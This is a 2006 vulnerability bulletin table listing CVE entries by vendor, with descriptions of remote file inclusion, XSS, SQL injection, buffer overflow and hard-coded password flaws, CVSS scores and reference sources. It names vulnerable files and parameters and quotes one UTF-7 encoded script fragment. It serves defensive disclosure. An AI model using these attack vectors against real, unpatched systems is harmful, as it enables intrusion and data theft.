Primary Vendor -- Product | Description | | CVSS Score | Source & Patch Info | Ageet -- AGEphone
| Stack-based buffer overflow in sipd.dll in AGEphone 1.24 and 1.38.1 allows remote attackers to execute arbitrary code via a crafted UDP SIP packet. | | 7.0 | CVE-2006-4029 BUGTRAQ FULLDISC OTHER-REF BID FRSIRT SECTRACK SECUNIA XF
| Archangel Management -- Archangel Weblog
| Multiple cross-site scripting (XSS) vulnerabilities in Archangel Management Archangel Weblog 0.90.02 allow remote attackers to inject arbitrary web script or HTML via the (1) Name or (2) Comment section. | | 7.0 | CVE-2006-4091 BUGTRAQ BID SECTRACK XF
| Barracuda Networks -- Barracuda Spam Firewall
| Login.pm in Barracuda Spam Firewall (BSF) 3.3.01.001 through 3.3.03.053 contains a hard-coded password for the guest account, which allows remote attackers to read sensitive information such as e-mail logs, and possibly e-mail contents and the admin password. | | 7.0 | CVE-2006-4001 BUGTRAQ BID XF
| Barracuda Networks -- Barracuda Spam Firewall
| preview_email.cgi in Barracuda Spam Firewall (BSF) 3.3.01.001 through 3.3.03.053 allows remote attackers to execute commands via shell metacharacters ("|" pipe symbol) in the file parameter. NOTE: the attack can be extended to arbitrary commands by the presence of CVE-2006-4000. | | 7.0 | CVE-2006-4081 BUGTRAQ BUGTRAQ
| Barracuda Networks -- Barracuda Spam Firewall
| Barracuda Spam Firewall (BSF), possibly 3.3.03.053, contains a hardcoded password for the admin account for logins from 127.0.0.1 (localhost), which allows local users to gain privileges. | | 7.0 | CVE-2006-4082 BUGTRAQ
| Brad Fears -- phpCodeCabinet
| PHP remote file inclusion vulnerability in Beautifier/Core.php in Brad Fears phpCodeCabinet 0.5 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the BEAUT_PATH parameter. | | 7.0 | CVE-2006-4044 FULLDISC OTHER-REF BID FRSIRT SECUNIA
| CakePHP -- CakePHP
| Cross-site scripting (XSS) vulnerability in cake/libs/error.php in CakePHP before 1.1.7.3363 allows remote attackers to inject arbitrary web script or HTML via the URL, which is reflected back in a 404 ("Not Found") error page. NOTE: some of these details are obtained from third party information. | | 7.0 | CVE-2006-4067 OTHER-REF SECUNIA
| CivicSpace -- CivicSpace
| Multiple cross-site scripting (XSS) vulnerabilities in CivicSpace 0.8.5 allow remote attackers to inject arbitrary web script or HTML via the (1) Subject, (2) Comment, and (3) Add new comment sections. | | 7.0 | CVE-2006-4088 BUGTRAQ BID
| Clam Anti-Virus -- ClamAV
| Heap-based buffer overflow in the pefromupx function in libclamav/upx.c in Clam AntiVirus (ClamAV) 0.81 through 0.88.3 allows remote attackers to execute arbitrary code via a crafted UPX packed file containing sections with large rsize values. | | 7.0 | CVE-2006-4018 OTHER-REF CLAMAV GENTOO MANDRIVA BID FRSIRT SECUNIA SECUNIA SECUNIA
| Comet -- Comet Webfile Manager
| PHP remote file inclusion vulnerability in CheckUpload.php in Vincenzo Valvano Comet WebFileManager (CWFM) 0.9.1, and possibly earlier, allows remote attackers to execute arbitrary PHP code via a URL in the Language parameter. | | 7.0 | CVE-2006-4077 OTHER-REF BID FRSIRT SECUNIA
| Computer Associates -- eTrust Antivirus WebScan
| Unspecified vulnerability in CA eTrust Antivirus WebScan allows remote attackers to execute arbitrary code due to "improper bounds checking when processing certain user input." | | 7.0 | CVE-2006-3975 OTHER-REF SECUNIA
| Computer Associates -- eTrust Antivirus WebScan
| Unspecified vulnerability in CA eTrust Antivirus WebScan before 1.1.0.1048 has unknown impact and remote attackers related to "improper processing of outdated WebScan components." | | 7.0 | CVE-2006-3977 OTHER-REF SECUNIA
| CounterChaos -- CounterChaos
| SQL injection vulnerability in counterchaos.php in CounterChaos 0.48c and earlier allows remote attackers to execute arbitrary SQL commands via the Referer HTTP header. | | 7.0 | CVE-2006-4035 BUGTRAQ OTHER-REF BID FRSIRT SECUNIA
| Csaba Godor -- SAPID Blog Beta 2
| Multiple PHP remote file inclusion vulnerabilities in Csaba Godor SAPID Blog Beta 2 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the (1) root_path parameter to (a) usr/extensions/get_blog_infochannel.inc.php, (b) usr/extensions/get_blog_meta_info.inc.php, or (c) usr/extensions/get_infochannel.inc.php; or the (2) GLOBALS[root_path] parameter to (d) usr/extensions/get_tree.inc.php. | | 7.0 | CVE-2006-4063 OTHER-REF FRSIRT XF
| David Walker -- phpAutoMembersArea
| PHP remote file inclusion vulnerability in auto_check_renewals.php in phpAutoMembersArea (phpAMA) 3.2.4 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the installed_config_file parameter. | | 7.0 | CVE-2006-4050 BUGTRAQ OTHER-REF BID
| DeluxeBB -- DeluxeBB
| pm.php (aka the PM system) in DeluxeBB 1.08, and possibly earlier, allows remote attackers to bypass authentication by providing an arbitrary username in the membercookie cookie parameter. | | 7.0 | CVE-2006-4078 BUGTRAQ BID FRSIRT SECUNIA XF
| DeluxeBB -- DeluxeBB
| Cross-site scripting (XSS) vulnerability in newpost.php in DeluxeBB 1.08, and possibly earlier, allows remote attackers to inject arbitrary web script or HTML via the subject parameter (aka the topic title field). | | 7.0 | CVE-2006-4079 BUGTRAQ BID XF
| Ehmig -- ME Download System
| Multiple PHP remote file inclusion vulnerabilities in ME Download System 1.3 allow remote attackers to execute arbitrary PHP code via a URL in the (1) Vb8878b936c2bd8ae0cab parameter to (a) inc/sett_style.php or (b) inc/sett_smilies.php; or the (2) Vb6c4d0e18a204a63b38f, (3) V18a78b93c3adaaae84e2, or (4) V9ae5d2ca9e9e787969ff parameters to (c) inc/datei.php. NOTE: the provenance of this information is unknown; the details are obtained from third party information. | | 7.0 | CVE-2006-4054 FRSIRT SECUNIA
| Ekilat LLC -- php(Reactor)
| PHP remote file inclusion vulnerability in editprofile.php in php(Reactor) 1.27pl1 allows remote attackers to execute arbitrary PHP code via a URL in the pathtohomedir parameter. | | 7.0 | CVE-2006-3983 OTHER-REF BID FRSIRT XF
| Fenestrae -- Faxination Server
| Unspecified vulnerability in Fenestrae Faxination Server allows remote attackers to execute arbitrary code via a crafted packet. | | 7.0 | CVE-2006-4037 OTHER-REF BID FRSIRT SECUNIA
| GaesteChaos -- GaesteChaos
| Multiple cross-site scripting (XSS) vulnerabilities in eintragen.php in GaesteChaos 0.2 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) gastname or (2) gastwohnort parameters. | | 7.0 | CVE-2006-4038 FULLDISC BID FRSIRT SECUNIA
| Gianluca Baldo -- Phpauction phpAdsNew -- phpAdsNew
| PHP remote file inclusion vulnerability in phpAdsNew/view.inc.php in Albasoftware Phpauction 2.1 and possibly later versions, with phpAdsNew 2.0.5, allows remote attackers to execute arbitrary PHP code via a URL in the phpAds_path parameter. | | 7.0 | CVE-2006-3984 BUGTRAQ OTHER-REF OTHER-REF BID XF
| IBM -- Informix IDS
| Buffer overflow in IBM Informix Dynamic Server (IDS) before 9.40.TC7 and 10.00 before 10.00.TC3, when running on Windows, allows remote attackers to execute arbitrary code via a long username. | | 7.0 | CVE-2006-3853 IBM BID FRSIRT SECUNIA XF
| IBM -- Informix Dynamic Database Server
| Multiple buffer overflows in IBM Informix Dynamic Server (IDS) before 9.40.TC6 and 10.00 before 10.00.TC3 allow remote authenticated users to execute arbitrary code via (1) the getname function, as used by (a) _sq_remview, (b) _sq_remproc, (c) _sq_remperms, (d) _sq_distfetch, and (e) _sq_dcatalog; and the (2) SET DEBUG FILE, (3) IFX_FILE_TO_FILE, (4) FILETOCLOB, (5) LOTOFILE, and (6) DBINFO functions (product defect IDs 171649, 171367, 171387, 171391, 171906, 172179). | | 7.0 | CVE-2006-3857 OTHER-REF BID FRSIRT SECUNIA XF XF XF XF XF XF
| IBM -- Informix IDS
| Buffer overflow in IBM Informix Dynamic Server (IDS) 9.40.TC5 through 9.40.xC7 and 10.00.TC1 through 10.00.xC3 allows attackers to execute arbitrary code via the SQLIDEBUG environment variable (envariable). | | 7.0 | CVE-2006-3862 IBM
| Jetbox -- Jetbox CMS
| Session fixation vulnerability in Jetbox CMS 2.1 SR1 allows remote attackers to hijack web sessions via a crafted link and the administrator section. | | 7.0 | CVE-2006-3583 BUGTRAQ OTHER-REF SECUNIA
| Jetbox -- CMS
| Dynamic variable evaluation vulnerability in index.php in Jetbox CMS 2.1 SR1 allows remote attackers to overwrite configuration variables via URL parameters, which are evaluated as PHP variable variables. | | 7.0 | CVE-2006-3584 BUGTRAQ SECUNIA SECUNIA
| Jetbox -- Jetbox CMS
| Multiple cross-site scripting (XSS) vulnerabilities in Jetbox CMS 2.1 SR1 allow remote attackers to inject arbitrary web script or HTML via the (1) login parameter in admin/cms/index.php, (2) unspecified parameters in the "Supply news" page in formmail.php, (3) the URL in the "Site statistics" page, and the (5) query_string parameter when performing a search. | | 7.0 | CVE-2006-3585 BUGTRAQ OTHER-REF SECUNIA
| Jetbox -- Jetbox CMS
| SQL injection vulnerability in Jetbox CMS 2.1 SR1 allows remote attackers to execute arbitrary SQL commands via the (1) frontsession COOKIE parameter and (2) view parameter in index.php, and the (3) login parameter in admin/cms/index.php. | | 7.0 | CVE-2006-3586 BUGTRAQ OTHER-REF SECUNIA
| Knusperleicht -- Quickie
| PHP remote file inclusion vulnerability in quickie.php in Knusperleicht Quickie, probably 0.2, allows remote attackers to execute arbitrary PHP code via a URL in the QUICK_PATH parameter. | | 7.0 | CVE-2006-3982 BUGTRAQ BID
| Knusperleicht -- Newsletter
| PHP remote file inclusion vulnerability in index.php in Knusperleicht Newsletter 3.5 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the NL_PATH parameter. | | 7.0 | CVE-2006-3986 BUGTRAQ Milw0rm BID FRSIRT SECUNIA XF
| Knusperleicht -- Guestbook
| PHP remote file inclusion vulnerability in index.php in Knusperleicht Guestbook 3.5 allows remote attackers to execute arbitrary PHP code via a URL in the GB_PATH parameter. | | 7.0 | CVE-2006-4007 BUGTRAQ BID XF
| Knusperleicht -- Faq
| PHP remote file inclusion vulnerability in index.php in Knusperleicht Faq 1.0 allows remote attackers to execute arbitrary PHP code via a URL in the faq_path parameter. | | 7.0 | CVE-2006-4008 BUGTRAQ BID XF
| Macromedia -- ColdFusion MX
| The AdminAPI of ColdFusion MX 7 allows attackers to bypass authentication by using "programmatic access" to the adminAPI instead of the ColdFusion Administrator. | | 7.0 | CVE-2006-3979 ADOBE
| Mambo -- Mambo Gallery Manager
| PHP remote file inclusion vulnerability in administrator/components/com_mgm/help.mgm.php in Mambo Gallery Manager (MGM) 0.95r2 and earlier for Mambo 4.5 allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter. | | 7.0 | CVE-2006-3980 BUGTRAQ OTHER-REF BID FRSIRT SECUNIA XF
| Mambo -- Mambo Gallery Manager
| PHP remote file inclusion vulnerability in about.mgm.php in Mambo Gallery Manager (MGM) 0.95r2 and earlier for Mambo 4.5 allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter. NOTE: the provenance of this information is unknown; the details are obtained from third party information. | | 7.0 | CVE-2006-3981 FRSIRT XF
| Microsoft -- Hyperlink Object Library
| Unspecified vulnerability in Microsoft Hyperlink Object Library (hlink.dll), possibly a buffer overflow, allows user-assisted attackers to execute arbitrary code via crafted hyperlinks that are not properly handled when hlink.dll "uses a file containing a malformed function," aka "Hyperlink Object Function Vulnerability." | | 7.0 | CVE-2006-3438 MS CERT CERT-VN
| Microsoft -- Windows 2000 Microsoft -- Windows Server 2003 Microsoft -- Windows XP
| Buffer overflow in the Server Service in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 allows remote attackers, including anonymous users, to execute arbitrary code via a crafted RPC message, a different vulnerability than CVE-2006-1314. | | 10.0 | CVE-2006-3439 MS CERT CERT-VN FRSIRT SECUNIA
| Microsoft -- Windows 2000 Microsoft -- Windows Server 2003 Microsoft -- Windows XP
| Buffer overflow in the Winsock API in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 allows remote attackers to execute arbitrary code via unknown vectors, aka "Winsock Hostname Vulnerability." | | 10.0 | CVE-2006-3440 MS CERT CERT-VN
| Microsoft -- Windows 2000 Microsoft -- Windows Server 2003 Microsoft -- Windows XP
| Buffer overflow in the DNS Client service in Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 SP1 allows remote attackers to execute arbitrary code via a crafted record response. | | 10.0 | CVE-2006-3441 MS CERT CERT-VN
| Microsoft -- Windows 2000
| Unspecified vulnerability in the kernel in Microsoft Windows 2000 SP4, probably a buffer overflow, allows local users to obtain privileges via unspecified vectors involving an "unchecked buffer." | | 7.0 | CVE-2006-3444 MS BID
| Microsoft -- PowerPoint
| Unspecified vulnerability in Microsoft PowerPoint 2000 through 2003, possibly a buffer overflow, allows user-assisted remote attackers to execute arbitrary commands via a malformed record in the BIFF file format used in a PPT file, a different issue than CVE-2006-1540, aka "Microsoft PowerPoint Malformed Record Vulnerability." | | 7.0 | CVE-2006-3449 MS CERT CERT-VN BUGTRAQ OTHER-REF
| Microsoft -- Internet Explorer
| Microsoft Internet Explorer 6 allows remote attackers to execute arbitrary code by using the document.getElementByID Javascript function to access crafted Cascading Style Sheet (CSS) elements, and possibly other unspecified vectors involving certain layout positioning combinations in an HTML file. | | 7.0 | CVE-2006-3450 MS CERT-VN BID CERT BUGTRAQ OTHER-REF FRSIRT SECUNIA
| Microsoft -- Internet Explorer
| Microsoft Internet Explorer 5 SP4 and 6 do not properly garbage collect when "multiple imports are used on a styleSheets collection" to construct a chain of Cascading Style Sheets (CSS), which allows remote attackers to execute arbitrary code via unspecified vectors. | | 7.0 | CVE-2006-3451 MS CERT CERT-VN BUGTRAQ OTHER-REF FRSIRT SECUNIA
| Microsoft -- Internet Explorer
| Microsoft Internet Explorer 5.01 SP4 and 6 does not properly handle various HTML layout component combinations, which allows user-assisted remote attackers to execute arbitrary code via a crafted HTML file that leads to memory corruption, aka "HTML Rendering Memory Corruption Vulnerability." | | 7.0 | CVE-2006-3637 MS CERT CERT-VN FRSIRT SECUNIA
| Microsoft -- Internet Explorer
| Microsoft Internet Explorer 5.01 and 6 does not properly handle uninitialized COM objects, which allows remote attackers to cause a denial of service (memory corruption) and possibly execute arbitrary code, aka "COM Object Instantiation Memory Corruption Vulnerability." | | 7.0 | CVE-2006-3638 MS FRSIRT SECUNIA
| Microsoft -- Internet Explorer
| Microsoft Internet Explorer 5.01 and 6 does not properly identify the originating domain zone when handling redirects, which allows remote attackers to read cross-domain web pages and possibly execute code via unspecified vectors involving a crafted web page, aka "Source Element Cross-Domain Vulnerability." | | 7.0 | CVE-2006-3639 MS CERT CERT-VN FRSIRT SECUNIA
| Microsoft -- Windows 2000 Microsoft -- Windows Server 2003 Microsoft -- Windows XP
| Unspecified vulnerability in Microsoft Windows 2000 SP4, XP SP1 and SP2, Server 2003 and 2003 SP1, allows remote attackers to execute arbitrary code via unspecified vectors involving unhandled exceptions, memory resident applications, and incorrectly "unloading chained exception." | | 7.0 | CVE-2006-3648 MS CERT CERT-VN FRSIRT
| MIT -- Kerberos 5
| The (1) ftpd and (2) ksu programs in MIT Kerberos 5 (krb5) up to 1.5, and 1.4.x before 1.4.4, do not check return codes for setuid calls, which might allow local users to gain privileges by causing setuid to fail to drop privileges. NOTE: as of 20060808, it is not known whether an exploitable attack scenario exists for these issues. | | 10.0 | CVE-2006-3084 OTHER-REF CERT-VN
| Mitch Murray -- Eremove
| Buffer overflow in the preview_create function in gui.cpp in Mitch Murray Eremove 1.4 allows remote attackers to cause a denial of service (application crash), and possibly execute arbitrary code, via a large email attachment. | | 7.0 | CVE-2006-4057 BUGTRAQ OTHER-REF BID SECTRACK
| ModernGigabyte -- ModernBill
| PHP remote file inclusion vulnerability in include/html/config.php in ModernGigabyte ModernBill 1.6 allows remote attackers to execute arbitrary PHP code via a URL in the DIR parameter. | | 7.0 | CVE-2006-4034 BUGTRAQ OTHER-REF BID XF
| myWebland -- myEvent
| PHP remote file inclusion vulnerability in viewevent.php in myWebland myEvent 1.x allows remote attackers to execute arbitrary PHP code via a URL in the myevent_path parameter, a different vector than CVE-2006-4040. NOTE: the provenance of this information is unknown; the details are obtained from third party information. | | 7.0 | CVE-2006-4083 FRSIRT SECUNIA
| Netious CMS -- Netious CMS
| Netious CMS 0.4 initializes session IDs based on the client IP address, which allows remote attackers to gain access to the administration section when originating from the same IP address as the administrator. NOTE: the provenance of this information is unknown; the details are obtained from third party information. | | 10.0 | CVE-2006-4048 FRSIRT SECUNIA
| Novell -- GroupWise WebAccess
| Cross-site scripting (XSS) vulnerability in Novell GroupWise WebAccess 6.5 and 7 before 20060727 allows remote attackers to inject arbitrary web script or HTML via an encoded SCRIPT element in an e-mail message with the UTF-7 character set, as demonstrated by the "+ADw-SCRIPT+AD4-" sequence. | | 7.0 | CVE-2006-3817 FULLDISC INFOBYTE NOVELL NOVELL FRSIRT SECUNIA XF
| OZJournals -- OZJournals
| Cross-site scripting (XSS) vulnerability in index.php in Elaine Aquino Online Zone Journals (OZJournals) 1.5 allows remote attackers to inject arbitrary web script or HTML via the keywords parameter. NOTE: the provenance of this information is unknown; the details are obtained from third party information. | | 7.0 | CVE-2006-4086 FRSIRT SECUNIA
| phpCC -- phpCC
| Multiple PHP remote file inclusion vulnerabilities in Fabian Hainz phpCC Beta 4.2 allow remote attackers to execute arbitrary PHP code via a URL in the base_dir parameter to (1) login.php, (2) reactivate.php, or (3) register.php. | | 7.0 | CVE-2006-4073 BUGTRAQ Milw0rm BID FRSIRT XF
| PHPSavant -- Savant2
| Multiple PHP remote file inclusion vulnerabilities in Paul M. Jones Savant2, possibly when used with the com_mtree component for Mambo and Joomla!, allow remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter in (1) Savant2_Plugin_stylesheet.php, (2) Savant2_Compiler_basic.php, (3) Savant2_Error_pear.php, (4) Savant2_Error_stack.php, (5) Savant2_Filter_colorizeCode.php, (6) Savant2_Filter_trimwhitespace.php, (7) Savant2_Plugin_ahref.php, (8) Savant2_Plugin_ahrefcontact.php, (9) Savant2_Plugin_ahreflisting.php, (10) Savant2_Plugin_ahreflistingimage.php, (11) Savant2_Plugin_ahrefmap.php, (12) Savant2_Plugin_ahrefownerlisting.php, (13) Savant2_Plugin_ahrefprint.php, (14) Savant2_Plugin_ahrefrating.php, (15) Savant2_Plugin_ahrefrecommend.php, (16) Savant2_Plugin_ahrefreport.php, (17) Savant2_Plugin_ahrefreview.php, (18) Savant2_Plugin_ahrefvisit.php, (19) Savant2_Plugin_checkbox.php, (20) Savant2_Plugin_cycle.php, (21) Savant2_Plugin_dateformat.php, (22) Savant2_Plugin_editor.php, (23) Savant2_Plugin_form.php, (24) Savant2_Plugin_image.php, (25) Savant2_Plugin_input.php, (26) Savant2_Plugin_javascript.php, (27) Savant2_Plugin_listalpha.php, (28) Savant2_Plugin_listingname.php, (29) Savant2_Plugin_modify.php, (30) Savant2_Plugin_mtpath.php, (31) Savant2_Plugin_options.php, (32) Savant2_Plugin_radios.php, (33) Savant2_Plugin_rating.php, or (34) Savant2_Plugin_textarea.php. | | 7.0 | CVE-2006-3990 BUGTRAQ BID SECTRACK XF
| Pike -- Pike
| SQL injection vulnerability in Pike before 7.6.86, when using a Postgres database server, allows remote attackers to execute arbitrary SQL commands via unspecified attack vectors. | | 7.0 | CVE-2006-4041 PIKE GENTOO BID FRSIRT SECUNIA SECUNIA XF
| Thomas Pequet -- phpPrintAnalyzer
| PHP remote file inclusion vulnerability in index.php in Thomas Pequet phpPrintAnalyzer 1.1 allows remote attackers to execute arbitrary PHP code via a URL in the rep_par_rapport_racine parameter. | | 7.0 | CVE-2006-4061 BUGTRAQ BID
| Torbstoff -- Torbstoff News
| PHP remote file inclusion vulnerability in news.php in Torbstoff News 4 allows remote attackers to execute arbitrary PHP code via a URL in the pfad parameter. | | 7.0 | CVE-2006-4045 OTHER-REF FRSIRT SECUNIA
| Turnkey Web Tools -- PHP Live Helper
| PHP remote file inclusion vulnerability in global.php in Turnkey Web Tools PHP Live Helper 2.0 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the abs_path parameter. | | 7.0 | CVE-2006-4051 BUGTRAQ ECHO Milw0rm BID SECTRACK
| Turnkey Web Tools -- PHP Simple Shop
| Multiple PHP remote file inclusion vulnerabilities in Turnkey Web Tools PHP Simple Shop 2.0 and earlier allow remote attackers to execute arbitrary PHP code via a URL in the abs_path parameter to (1) admin/index.php, (2) admin/adminindex.php, (3) admin/adminglobal.php, (4) admin/login.php, (5) admin/menu.php or (6) admin/header.php. | | 7.0 | CVE-2006-4052 OTHER-REF OTHER-REF SECUNIA
| User Home Pages -- User Home Pages
| Multiple PHP remote file inclusion vulnerabilities in (1) uhp_config.php, and possibly (2) footer.php, (3) functions.php, (4) install.uhp.php, (5) toolbar.uhp.html.php, (6) uhp.class.php, and (7) uninstall.uhp.php, in the UHP (User Home Pages) 0.5 component (aka com_uhp) for Mambo or Joomla! allow remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter. | | 7.0 | CVE-2006-3995 OTHER-REF OTHER-REF BID FRSIRT OSVDB OSVDB SECUNIA XF
| USolved -- NEWSolved Lite
| Multiple PHP remote file inclusion vulnerabilities in USOLVED NEWSolved Lite 1.9.2, and possibly earlier, allow remote attackers to execute arbitrary PHP code via a URL in the abs_path parameter to (1) newsscript_lyt.php, (2) newsticker/newsscript_get.php, (3) inc/output/news_theme1.php, (4) inc/output/news_theme2.php, or (5) inc/output/news_theme3.php. | | 7.0 | CVE-2006-4059 BUGTRAQ OTHER-REF OTHER-REF OTHER-REF BID FRSIRT SECUNIA
| Voc-Project -- Voodoo Chat
| PHP remote file inclusion vulnerability in index.php in Vlad Vostrykh Voodoo chat 1.0RC1b and earlier allows remote attackers to execute arbitrary PHP code via a URL in the file_path parameter. | | 7.0 | CVE-2006-3991 Milw0rm BID FRSIRT
| VWar -- Virtual War
| SQL injection vulnerability in war.php in Virtual War (Vwar) 1.5.0 and earlier allows remote attackers to execute arbitrary SQL commands via the page parameter. | | 7.0 | CVE-2006-4010 BUGTRAQ BID
| Web-Scripts -- Visual Events Calendar
| PHP remote file inclusion vulnerability in calendar.php in Visual Events Calendar 1.1 allows remote attackers to execute arbitrary PHP code via a URL in the cfg_dir parameter. | | 7.0 | CVE-2006-4060 BUGTRAQ OTHER-REF BID SECTRACK SECUNIA
| Webligo -- BlogHoster
| Cross-site scripting (XSS) vulnerability in Webligo BlogHoster 2.2 allows remote attackers to inject arbitrary web script or HTML via the "From: part of the comment post." | | 7.0 | CVE-2006-4090 BUGTRAQ
| WoWRoster -- WoWRoster
| PHP remote file inclusion vulnerability in hsList.php in WoWRoster (aka World of Warcraft Roster) 1.5.x and earlier allows remote attackers to execute arbitrary PHP code via a URL in the subdir parameter. | | 7.0 | CVE-2006-3997 BUGTRAQ OTHER-REF BID XF SECUNIA
| WoWRoster -- WoWRoster
| PHP remote file inclusion vulnerability in conf.php in WoWRoster (aka World of Warcraft Roster) 1.5.1 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the subdir parameter. | | 7.0 | CVE-2006-3998 OTHER-REF OTHER-REF BID FRSIRT XF
| XennoBB -- XennoBB
| SQL injection vulnerability in profile.php in XennoBB 2.1.0 and earlier allows remote authenticated users to execute arbitrary SQL commands via the (1) bday_day, (2) bday_month, and (3) bday_year parameters in the personal section. | | 7.0 | CVE-2006-4025 BUGTRAQ BID
| XMB Software -- XMB Forum
| SQL injection vulnerability in the u2u_send_recp function in u2u.inc.php in XMB (aka extreme message board) 1.9.6 Alpha and earlier allows remote attackers to execute arbitrary SQL commands via the u2uid parameter to u2u.php, which is directly accessed from $_POST and bypasses the protection scheme. | | 7.0 | CVE-2006-3994 OTHER-REF BID FRSIRT SECUNIA
| YenerTurk -- YenerTurk Haber Script
| SQL injection vulnerability in default.asp in YenerTurk Haber Script 1.0 and earlier allows remote attackers to execute arbitrary SQL commands via the id parameter. | | 7.0 | CVE-2006-4064 OTHER-REF BID FRSIRT SECUNIA
| ZoneMetrics -- ZoneX Publishers Gold Edition
| PHP remote file inclusion vulnerability in includes/usercp_register.php in ZoneMetrics ZoneX Publishers Gold Edition 1.0.3 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the phpbb_root_path parameter. | | 7.0 | CVE-2006-4036 BUGTRAQ BID FRSIRT SECUNIA
|